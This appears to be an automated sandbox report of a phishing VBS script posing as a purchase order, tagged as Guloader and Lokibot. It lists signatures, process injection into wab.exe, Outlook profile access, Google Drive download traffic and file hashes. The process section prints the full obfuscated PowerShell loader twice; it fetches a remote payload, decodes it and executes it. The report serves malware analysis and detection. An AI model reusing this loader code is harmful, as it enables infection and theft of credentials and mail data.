memory/1136-58-0x0000000076CF0000-0x0000000076E99000-memory.dmp

memory/1136-59-0x0000000072D30000-0x00000000732DB000-memory.dmp

memory/1136-60-0x0000000002CD0000-0x0000000002D10000-memory.dmp

memory/1136-61-0x0000000076EE0000-0x0000000076FB6000-memory.dmp

memory/2796-62-0x0000000000A20000-0x0000000003840000-memory.dmp

memory/2796-63-0x0000000076CF0000-0x0000000076E99000-memory.dmp

memory/2796-64-0x0000000076EE0000-0x0000000076FB6000-memory.dmp

memory/2796-65-0x0000000076F16000-0x0000000076F17000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f162ad07b9edfb1bddeb70b568f2466d
SHA1 bc033077f34e28deff7e99265c05a68cf93ab1c0
SHA256 e1a611bae1f29f2a467af83c6d42186742a43146eea12eee15d4e2995cd8831d
SHA512 8ee786e70fefd98c67f7ddef244ea957e2e82b69207dd10274169e71685eb081c80c7c85898e81c8203ba4a5ab3ffe7bc31369dce1c19b59e845fb1bcb50e4e2

C:\Users\Admin\AppData\Local\Temp\TarC0B1.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/1136-83-0x0000000006D50000-0x0000000009B70000-memory.dmp

memory/2796-87-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1136-91-0x0000000006D50000-0x0000000009B70000-memory.dmp

memory/1212-92-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/2796-96-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2796-97-0x0000000000A20000-0x0000000003840000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-11 14:32

Reported

2024-03-11 14:34

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3976 set thread context of 4612 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 2968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 3316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3976 wrote to memory of 2740 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 2740 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 2740 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 4612 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 33.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 74.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp

Files

memory/2968-4-0x0000013DAA840000-0x0000013DAA862000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmwmh0cn.vnw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2968-14-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp

memory/2968-16-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/2968-15-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/2968-17-0x0000013DAAD10000-0x0000013DAAD36000-memory.dmp

memory/2968-18-0x0000013DAADA0000-0x0000013DAADB4000-memory.dmp

memory/2968-19-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/3976-20-0x00000000028A0000-0x00000000028D6000-memory.dmp

memory/3976-21-0x0000000074F10000-0x00000000756C0000-memory.dmp

memory/2968-22-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp

memory/3976-23-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3976-24-0x0000000005580000-0x0000000005BA8000-memory.dmp

memory/3976-30-0x00000000053F0000-0x0000000005412000-memory.dmp

memory/3976-35-0x0000000005C20000-0x0000000005C86000-memory.dmp

memory/3976-36-0x0000000005C90000-0x0000000005CF6000-memory.dmp

memory/3976-37-0x0000000005D00000-0x0000000006054000-memory.dmp

memory/3976-38-0x0000000006180000-0x000000000619E000-memory.dmp

memory/3976-39-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/3976-40-0x00000000079D0000-0x000000000804A000-memory.dmp

memory/3976-41-0x0000000007350000-0x000000000736A000-memory.dmp

memory/3976-42-0x0000000007410000-0x00000000074A6000-memory.dmp

memory/3976-43-0x00000000073B0000-0x00000000073D2000-memory.dmp

memory/3976-44-0x0000000008600000-0x0000000008BA4000-memory.dmp

memory/3976-45-0x00000000073E0000-0x0000000007402000-memory.dmp

memory/2968-46-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/3976-47-0x0000000007680000-0x0000000007694000-memory.dmp

memory/3976-48-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3976-49-0x00000000078E0000-0x00000000078E1000-memory.dmp

memory/3976-50-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/3976-51-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/2968-52-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/3976-53-0x0000000074F10000-0x00000000756C0000-memory.dmp

